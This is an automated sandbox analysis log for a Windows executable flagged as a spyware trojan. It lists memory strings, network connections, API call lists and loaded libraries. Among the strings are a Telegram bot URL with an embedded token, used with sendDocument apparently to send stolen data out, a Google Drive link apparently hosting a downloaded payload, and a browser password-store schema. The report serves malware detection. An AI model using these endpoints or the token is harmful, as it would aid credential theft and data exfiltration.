            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgX
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036114000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: FILHKLtCw0.exe, 00000004.00000002.3310429349.0000000038998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: FILHKLtCw0.exe, 00000004.00000002.3310429349.0000000038998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/H
            Source: FILHKLtCw0.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000360A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Y
            Source: FILHKLtCw0.exe, 00000004.00000002.3290435449.0000000007680000.00000004.00001000.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ
            Source: FILHKLtCw0.exe, 00000004.00000003.3019370982.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: FILHKLtCw0.exe, 00000004.00000003.3019370982.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/VT
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ&export=download
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.000000003611F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: FILHKLtCw0.exe, 00000004.00000003.2984303295.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000003.2984393313.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 59246 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59248 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59244 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59243 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59241 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59246
            Source: unknownNetwork traffic detected: HTTP traffic on port 59254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59248
            Source: unknownNetwork traffic detected: HTTP traffic on port 59256 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59241
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59244
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59243
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59240
            Source: unknownNetwork traffic detected: HTTP traffic on port 59258 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59250
            Source: unknownNetwork traffic detected: HTTP traffic on port 59252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59250 -> 443
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:59240 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.5:59241 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:59244 version: TLS 1.2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_004070414_2_00407041
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_0040686A4_2_0040686A
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_00404B304_2_00404B30
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_001143284_2_00114328
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_001190484_2_00119048
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_001159684_2_00115968
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_00115F904_2_00115F90
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_001127B94_2_001127B9
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_00112DD14_2_00112DD1
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_383878484_2_38387848
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_383833184_2_38383318
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_383803B04_2_383803B0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838CCA04_2_3838CCA0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838C6384_2_3838C638
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838566E4_2_3838566E
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838B07F4_2_3838B07F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838F0544_2_3838F054
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838B9304_2_3838B930
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838C1F24_2_3838C1F2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838DA894_2_3838DA89
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838E3394_2_3838E339
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838E3474_2_3838E347
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838EBF24_2_3838EBF2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838CCA24_2_3838CCA2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838B4D84_2_3838B4D8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838BD9C4_2_3838BD9C
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38387E1E4_2_38387E1E
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38386EA04_2_38386EA0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38386E914_2_38386E91
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838DEE14_2_3838DEE1
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838E79F4_2_3838E79F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838E7904_2_3838E790
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDA9B04_2_38EDA9B0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDBA8E4_2_38EDBA8E
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDA3604_2_38EDA360
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDBDF04_2_38EDBDF0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED9D104_2_38ED9D10
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED96C84_2_38ED96C8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED86504_2_38ED8650
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED20F84_2_38ED20F8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED70614_2_38ED7061
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED70704_2_38ED7070
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED00404_2_38ED0040
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED18584_2_38ED1858
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED48204_2_38ED4820
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED48124_2_38ED4812
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED51F84_2_38ED51F8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDA9A04_2_38EDA9A0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED29B84_2_38ED29B8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDF1384_2_38EDF138
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED21084_2_38ED2108
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED5AA84_2_38ED5AA8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED5AB84_2_38ED5AB8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDBA974_2_38EDBA97
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED32684_2_38ED3268
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED32584_2_38ED3258
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED52084_2_38ED5208
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED52074_2_38ED5207
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED13F04_2_38ED13F0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED43C84_2_38ED43C8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED63684_2_38ED6368
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED7B4F4_2_38ED7B4F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED63584_2_38ED6358
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDA3524_2_38EDA352
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED3B084_2_38ED3B08
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED3B184_2_38ED3B18
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED74C84_2_38ED74C8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED1CA04_2_38ED1CA0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED74B84_2_38ED74B8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED1CB04_2_38ED1CB0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED6C094_2_38ED6C09
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED14004_2_38ED1400
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED6C184_2_38ED6C18
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED4DB04_2_38ED4DB0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED4DB24_2_38ED4DB2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED25604_2_38ED2560
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED255F4_2_38ED255F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED25504_2_38ED2550
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED9D004_2_38ED9D00
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED36C04_2_38ED36C0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED36C24_2_38ED36C2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED0EB94_2_38ED0EB9
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED96B84_2_38ED96B8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED56604_2_38ED5660
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED86404_2_38ED8640
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED56504_2_38ED5650
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED2E004_2_38ED2E00
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED2E104_2_38ED2E10
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDAFE84_2_38EDAFE8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDAFF84_2_38EDAFF8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38EDAFF74_2_38EDAFF7
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED67C04_2_38ED67C0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED0FA84_2_38ED0FA8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED67B04_2_38ED67B0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED3F704_2_38ED3F70
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED3F724_2_38ED3F72
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_38ED5F104_2_38ED5F10
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3940E8704_2_3940E870
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3940D6E84_2_3940D6E8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_394075E84_2_394075E8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: String function: 00402BBF appears 51 times
            Source: FILHKLtCw0.exe, 00000004.00000002.3308981661.0000000035EF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FILHKLtCw0.exe
            Source: FILHKLtCw0.exe, 00000004.00000002.3289900062.0000000005B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FILHKLtCw0.exe
            Source: FILHKLtCw0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeMutant created: NULL
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeFile created: C:\Users\user\AppData\Local\Temp\nsh429.tmpJump to behavior
            Source: FILHKLtCw0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036195000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036185000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361C4000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361B7000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361A3000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3310056551.00000000370CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: FILHKLtCw0.exeReversingLabs: Detection: 60%
            Source: FILHKLtCw0.exeVirustotal: Detection: 75%
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeFile read: C:\Users\user\Desktop\FILHKLtCw0.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\FILHKLtCw0.exe "C:\Users\user\Desktop\FILHKLtCw0.exe"
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess created: C:\Users\user\Desktop\FILHKLtCw0.exe "C:\Users\user\Desktop\FILHKLtCw0.exe"
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess created: C:\Users\user\Desktop\FILHKLtCw0.exe "C:\Users\user\Desktop\FILHKLtCw0.exe"Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: sspicli.dllJump to behavior
